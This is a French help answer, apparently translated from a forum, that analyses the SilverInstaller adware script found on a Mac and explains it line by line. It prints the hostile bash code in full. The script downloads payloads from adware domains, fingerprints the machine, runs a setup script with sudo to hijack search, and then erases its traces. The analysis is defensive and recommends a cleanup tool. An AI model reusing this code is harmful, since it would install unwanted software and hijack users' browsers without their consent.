Quel est cet exécutable inconnu sur mon volume de démarrage ? Est-il malveillant ?

C'est SilverInstaller , adware pour télécharger plus d'adware et ' les programmes potentiellement indésirables '. Il a probablement été distribué par le biais de fausses fenêtres pop-up Flash, sur lesquelles quelqu'un a cliqué, qu'il a téléchargées, ouvertes, installées et auxquelles il a fourni des informations d'identification d'administrateur.

Les logiciels installés dans ce paquetage comprennent probablement

MacKeeper, VSearch, Un injecteur de Pirrit, BrowserEnhancer, MPlayer

tout ce que vous ne voulez certainement pas.

• https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/
• https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

Je vais décomposer le code

#!/bin/bash

Ce code est script à interpréter par bash, noté par ceci shebang .

func_4(){

Commencez une déclaration de fonction incluant le corps qui sera appelé plus tard.

/bin/mkdir -p /var/tmp

Assurez-vous que le répertoire tmp existe et qu'il sera utilisé pour le stockage temporaire des charges utiles malveillantes par la suite.

/usr/bin/curl -s -L -o /var/tmp/sr.tgz "http://c.premiummac.com/static/sr/sr_v2.tgz"
/usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp
cd /var/tmp/dvs

Téléchargez et extrayez la première charge utile malveillante. sr_v2.tgz est BrowserEnhancer. La charge utile contient un répertoire dvs.

mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

Obtenez un identifiant unique pour cette machine, qui sera utilisé ultérieurement.

COUNTRY="CA"
if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ] || [ "$COUNTRY" == "NZ" ]\
  || [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ] || [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\
  || [ "$COUNTRY" == "DE" ]; then

Essayez de faire correspondre les régions pour décider de la marche à suivre. Je dis 'essayer' parce que cela ne fonctionne pas lorsque la région est codée en dur dans le script.

    sudo ./setup.sh "http://www.searchitdown.com/?n=026&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/?n=026&searchsource=69&UM=8&gd=SY1000653" "http://www.searchitdown.com/Results.aspx?n=026&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd" "http://i.firstinstallmac.club/c/cc?id="

Appel à un script externe avec des domaines adware plus fantaisistes.

else
    sudo ./setup.sh "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=hp&type=YHS_TGE_2712c1&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=nt&type=YHS_TGE_2712c1&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=ds&type=TGE_2712c1" "snowbitt" "upd" "http://i.firstinstallmac.club/c/cc?id="
fi

Ce bit n'est jamais exécuté comme indiqué.

CLIENT_COMP=""
if [[ ! -z "$CLIENT_COMP" ]]; then
    /usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.firstinstallmac.club/is/if?i="
fi

Prenez une autre charge utile.

func_taaVqst(){
sleep 220
rm -rf /var/tmp/dvs
rm -rf /var/tmp/sr.tgz
}
func_taaVqst &

Nettoyer, en supprimant les fichiers créés et déposés plus tôt dans le script, après un délai étant donné que les fichiers auraient déjà été utilisés.

}
func_4 &

La fonction est prête, il est temps de l'appeler.

Ce script fait tout ce que j'attendais d'un logiciel malveillant et existe depuis longtemps pendant un certain temps, de sorte que les domaines qu'il connecte pourraient être bloqués ou fermés maintenant.

• Il télécharge des fichiers, les exécute et nettoie après son passage.

Il pourrait s'agir d'un logiciel publicitaire plutôt que d'un logiciel malveillant, mais il est clair qu'il prend l'empreinte digitale de votre Mac, qu'il rapporte un identifiant unique pour votre Mac et qu'il a l'intention de modifier l'état du Mac. À moins que vous n'ayez choisi d'utiliser l'outil et que vous vouliez qu'il fonctionne (et même si vous l'avez fait une fois), télécharger et exécuter le nettoyeur MalwareBytes serait ma prochaine étape.

• https://www.malwarebytes.com/